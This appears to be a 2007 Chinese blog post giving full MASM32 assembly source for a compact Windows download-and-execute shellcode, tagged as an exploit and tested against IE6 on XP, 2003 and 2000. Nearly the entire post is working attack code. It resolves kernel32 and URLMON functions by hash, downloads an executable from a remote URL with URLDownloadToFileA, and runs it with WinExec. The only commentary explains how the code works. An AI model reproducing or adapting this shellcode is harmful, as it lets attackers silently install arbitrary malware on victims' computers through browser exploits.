2007年6月24日星期日

[Exploit]Tiny Download&&Exec ShellCode

Author: czy
http://www.ph4nt0m.org
Date:2007-06-22


;Tiny Download&&Exec ShellCode codz czy 2007.6.1
;header 
163=61(16+8+9+(28))+95(68+27)+17
;
163+19=192
comment 
%
                #
--------------------------------------#          #
              #  Tiny Download
&&Exec ShellCode-->       #       #
            #    
-->size 192                              #   #
          #                      
2007.06.01                 # 
            #                    codz: czy                #   #
             #
------------------------------------------#      #

system :test on ie6
+XPSP2/2003SP2/2kSP4
%
.
586
.model flat,stdcall
option casemap:none

include     c:\masm32\include\windows.inc
include     c:\masm32\include\kernel32.inc
includelib  c:\masm32\lib\kernel32.lib
include     c:\masm32\include\user32.inc
includelib  c:\masm32\lib\user32.lib


.data
shelldatabuffer db 
1024 dup(0)
shellcodebuffer db 
2046 dup(0)
downshell db 
'down exploit',0
txtname  db 
'c:\office\unicode.doc',0
.code
start:
 invoke MessageBoxA,
0,offset downshell,offset downshell,1
 invoke RtlMoveMemory,offset shellcodebuffer,00401040H,
256
 mov eax,offset shellcodebuffer
 jmp eax
 somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h
;上面的代码是把在代码段中的shellcode移动数据段中执行,模拟真实的shellcode执行环境 
@@shellcodebegin:  
 call @@beginaddr
@@beginaddr:
 PUSH 03H      ;要调用的API函数个数
 jmp @@realshellcode         
myExitProcess     dd 073e2d87eh  
myWinExec         dd 00e8afe98h   
myLoadLibraryA    dd 0ec0e4e8eh
dll               db 
'URLMON',0,0
myUrlDownFile     dd 0702f1a36h
path              db 
'c:\a.exe',0
url               db 
'http://www.masm32.net/a.exe',0

 

@@realshellcode:
    POP ECX
    POP EDI
    SCASD ;edi
+4
;得到kernel32.dll基地址
db  67h,64h,0A1h,30h,00h
 mov eax, [eax
+0cH]
 mov esi, [eax
+1cH]
    lodsd
 mov ebp, [eax
+08H]          ;EBP中存放kernel32.dll的基地址
;处理导出表
@@next2:
PUSH      ECX
@@next3:
MOV       ESI,[EBP
+3Ch]
MOV       ESI,[EBP
+ESI+78h]
ADD       ESI,EBP
PUSH      ESI
MOV       ESI,[ESI
+20h]
ADD       ESI,EBP
XOR       ECX,ECX
DEC       ECX
@@next:
INC       ECX
LODSD
ADD       EAX,EBP
XOR       EBX,EBX
@@again:
    MOVSX     EDX,BYTE PTR [EAX]
    CMP       DL,DH
    JZ        @@end
    ROR       EBX,0Dh
    ADD       EBX,EDX
    INC       EAX
    JMP       @@again
@@end:
CMP       EBX,[EDI]
JNZ       @@next

POP       ESI
MOV       EBX,[ESI
+24h]
ADD       EBX,EBP
MOV       CX,WORD PTR [ECX
*2+EBX]
MOV       EBX,[ESI
+1Ch]
ADD       EBX,EBP
MOV       EAX,[ECX
*4+EBX]
ADD       EAX,EBP
STOSD
POP       ECX
loop @@next2

mov ecx,[edi]   ;
2
cmp cl,
'c'      ;3
jz @@downfile   ;
2
PUSH EDI
CALL EAX        ;
2
xchg eax,ebp
scasd
scasd
push 
01         ;2第二个DLL的函数个数
jmp @@next3     ;
2
                ;总计17

        
@@downfile:

 push edx  ;
0
 push edx  ;
0
 push    edi  ;file
=c:\a.exe
 lea     ecx, dword ptr [edi
+9h]
 push    ecx  ;url
 push edx  ;
0
 call eax  ;URLDownloadToFileA,
0,url,file=c:\a.exe,0,0
 
 
 push 
1 ;FOR TEST
 push edi
 call dword ptr [edi
-14H] ;winexec,'c:\xxx.exe',1
 
    call dword ptr [edi
-18H] ;Exitprocess

    somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h
    invoke ExitProcess,
0
end start

没有评论: